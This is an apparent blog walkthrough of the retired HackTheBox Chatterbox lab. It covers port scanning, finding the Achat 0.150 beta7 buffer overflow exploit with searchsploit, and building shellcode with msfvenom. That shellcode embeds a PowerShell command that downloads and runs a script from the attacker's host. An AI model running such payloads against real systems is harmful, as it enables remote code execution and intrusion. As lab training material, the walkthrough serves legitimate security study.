Complete HackTheBox Chatterbox Walkthrough (Powershell)

Today I am solving the HackTheBox Chatterbox machine. This is a retired machine but is great to study Windows privilege escalation.

HackTheBox Chatterbox
HackTheBox Chatterbox

I am doing this machine to help me understand better the Windows Exploitation and prepare myself to eCPPTv2 certification by eLearnSecurity.

To start I will scan the machine with rustscan checking all 65535 ports available.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ rustscan -a chatterbox.htb -- -p-
Complete HackTheBox Chatterbox Walkthrough (Powershell)

The machine has two open ports let’s check what services are running on them using nmap.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ nmap -T4 -A -p- chatterbox.htb -Pn -p9255,9256
Complete HackTheBox Chatterbox Walkthrough (Powershell)

Nmap scan shows the service AChat system is running on both ports the port 9255 has an HTTPD service and the port 9256 has the chat system.

Let’s search for an exploit using searchsploit script and enumerate all folders and files on port 9255 since it has a HTTP server running.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ searchsploit achat

searchsploit achat
searchsploit achat

Great searchsploit found an exploit for a Remote Buffer Overflow on Achat system,

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ searchsploit -m windows/remote/36025.py
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
File Type: Python script, ASCII text executable, with very long lines (637)

Copied to: /home/rfs/HackTheBox/HTB_Chatterbox/36025.py

Exploitation

How to Generate Metasploit Payloads

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-ObjectNet.WebClient).downloadString('http://10.10.14.52/writeup.ps1')\"" -e x86/unicode_mixed -b'\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python > new.txt
┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ python3 -m http.server 80

HackTheBox Chatterbox

Achat 0.150 beta7 – Remote Buffer Overflow

Leave a Comment

Are you excited?We are giving away a $50 gift card every day

Don’t miss the chance to participate in the biggest giveaway of this year.

Newsletter Signup

Subscribe to our weekly newsletter below and never miss the latest product or an exclusive offer.